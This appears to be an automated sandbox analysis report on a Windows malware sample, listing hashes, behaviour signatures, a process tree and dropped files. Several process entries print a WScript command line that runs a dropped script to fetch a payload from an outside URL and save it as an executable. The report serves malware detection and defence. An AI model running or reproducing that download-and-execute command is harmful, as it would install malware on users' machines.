Analysis

  • max time kernel
    120s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    29-05-2024 11:22

General

  • Target

    8092b13f7e18ef5c2de59ea0d41247a7_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    8092b13f7e18ef5c2de59ea0d41247a7

  • SHA1

    6cf1449c71e19783f9864f84c3e1137e49401fd4

  • SHA256

    d5c1a1f3788b8498fba6f61c365b08baf0fdd2765efde052baa97919d9f6a6d1

  • SHA512

    83e959891c3591e677b81c2b7e633f6877a689a398a93911121119f528e9e60d217a12903f78555147d4759604a444fb0925779070a30eb81b0f58fd56e706ca

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3KT:/7BSH8zUB+nGESaaRvoB7FJNndnRT

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 14 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8092b13f7e18ef5c2de59ea0d41247a7_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\8092b13f7e18ef5c2de59ea0d41247a7_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1364
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1777.js" http://www.djapp.info/?domain=OqEvlUHhJn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf1777.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:2932
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1777.js" http://www.djapp.info/?domain=OqEvlUHhJn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf1777.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:2752
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1777.js" http://www.djapp.info/?domain=OqEvlUHhJn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf1777.exe
      2⤵
      • Blocklisted process makes network request
      PID:2204
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1777.js" http://www.djapp.info/?domain=OqEvlUHhJn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf1777.exe
      2⤵
      • Blocklisted process makes network request
      PID:1616
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1777.js" http://www.djapp.info/?domain=OqEvlUHhJn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyy C:\Users\Admin\AppData\Local\Temp\fuf1777.exe
      2⤵
      • Blocklisted process makes network request
      PID:704

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    6c93f60553415802769aea371043b2a5

    SHA1

    77d4fae422f2f5af9d6fbcfacf877a5a35a85d1c

    SHA256

    bfcb18fa2ee3598fdff75b1ecc932c926f011bff60edfa141c41976499c821c5

    SHA512

    ca99fb34beb68dd3e2169edc3c30f964702e209439b4f37b292d6f5e39e1361eeb3251201faf9aa4789db66c23e5d55043a4e9a37e2ea4f319d2cd2951ccd965

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    f6d110e5c1269781668283cb988610ee

    SHA1

    22b383fc5eb525d8ac311afd2663646c92653122

    SHA256

    57bf8c2eb9238fada50f34f8844fd525f937900f838bb760431461013a15e9ed

    SHA512

    5f9252e267c4b710dd5d7deaa70c760629e3153d6207e22cd311f879a5c8bd97f631c233816f3b885e4b0a1564fc3b71b520482adf43b787580ef5483d181b4c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    23fdb57f89b4a5db8c9ee6b1384e0a16

    SHA1

    75427679ae726fb9ebff5c3092d56bf3bc0d08f5

    SHA256

    c547e5ccd4d8dacef831e092b24c68465073bfc2825d66454c35e2eb866a7edc

    SHA512

    470ea55b4627309f08b169b5a0dc0a24b938ba364415a38a659f9c22ffeca506c00dff71a367ecb6573d2e5507a986eeedb389cc7626c39f4d19cc8a00b17649

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    853f3beb4bc2f0e2234f6bcc47ffaa6c

    SHA1

    e8dd5f98a5554654103aa525d299e0b3f4ca2c1c

    SHA256

    17b9091a816201d2a69b227305d0526dcc1290a57d2de7e6d7bbd97d187cfb3e

    SHA512

    ab8e5c4b9ab17ec8d9c7c6f08da3790078743bb286f57b6de35ecdd055a073348f4076e8634203bfa9053acb6caf0ec288e865babfcb475f635ecf6c78aed8b6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    242B

    MD5

    ef05c71bb4dca43fcee5c6c021ab8a7d

    SHA1

    f217e807e3474f301af0cc69f65217e191617ed1

    SHA256

    e06f2f1a5ec6af505f9563d18858d47e27ac1568e418de34e01b1d0ea3b0551f

    SHA512

    09683fe3c7cbbd9a7174baead65d1b5eef7068b92cf91b79e024a944d8c59711f38180c88d389e2a945678d3ff51072c096a3801e09962c099b15f031644b2f5

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CWGMJO5I\domain_profile[1].htm

    Filesize

    6KB

    MD5

    377a2b86de5dd033eefbe38ee6702750

    SHA1

    06f59e22059fbc4c0b9f8f525cdd4ff1b391770f

    SHA256

    aa9c6e21b1c1f61acd6df59c8209cc071cec3d442a4d3b93a9ec4d93b2cab4ad

    SHA512

    1777ff898faf1e398e9d21ac747e95807b09e47bb527b2c4de898b6b119f676cc08850bf66c46b65d48cde35fa3b81d3e94903b219f12c72f9bafdd56ea127c5

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\CWGMJO5I\domain_profile[1].htm

    Filesize

    40KB

    MD5

    4031f394210e1e087cfcb5cb36eedd4d

    SHA1

    13ef36b309e0b5f61f9228b3e873a71cb19b0ab2

    SHA256

    b195744dadd815e7ef2a20848686daad88c9e582e056d79820b4fb9532ffa6da

    SHA512

    33eeb5ba3c4d35dcf03ebc944f54e35e7a5aa0af0dea06319ced0cfb9a1d9f020a76cd972234898e68dcd27b09a641322c7c8c2015b04124a8af3497154f6c12

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OGQT3LF9\domain_profile[1].htm

    Filesize

    6KB

    MD5

    414e22d2369a454337a0ae37844dccc2

    SHA1

    0c31e882c6c3856ed88913713150f354155ac881

    SHA256

    361d3fe79225e4bf5f5b973c32381b1edd9b1aff4a4cf091efdd3ec7b47b323d

    SHA512

    f6f834ce72dce728e4d09ea5aad131a391dcf344fe122eea2224c42f4526e3f62e83fbdde5cbba9192b3cbb80d87b0484582622ac700fe1c2cf63ff6a8f81c9b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OGQT3LF9\domain_profile[1].htm

    Filesize

    6KB

    MD5

    30544b5669dafc072f0f2a104d0c9360

    SHA1

    04931886fab0ab67aab4af1b59b4efbe5dc5768f

    SHA256

    8e1a90627032cbf627a726f53f1b26e35c8ca50f6acc9877e493d38d007b0b7f

    SHA512

    c5ac6a80977cd8d7ffac48fe5bbce1fe8cbd61b5b405bc65ddffd66ab26e96dd99784e9da6a4c034e4b07b8af3dc0df097ecbf405fa946a12f7ee61d524e16bd

  • C:\Users\Admin\AppData\Local\Temp\Tar5FEC.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\fuf1777.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\D7KF7WOY.txt

    Filesize

    175B

    MD5

    9991ec4f279d6d08328446be7e8d6f2c

    SHA1

    58754257c3b2f2f5b55b67e278a15038413cb87c

    SHA256

    0ea5392db2e9775fe3ee61c2c5e19e13e48238663ee27b365f69f90e7ddafbdd

    SHA512

    0753edb0c54bffb3a74d6fb65255aed635b02d66223ebd2eff77c597e6cb951df402350f29828e5b5628ba7624574a1e7af39f5a70f08a9255903b39cc597be0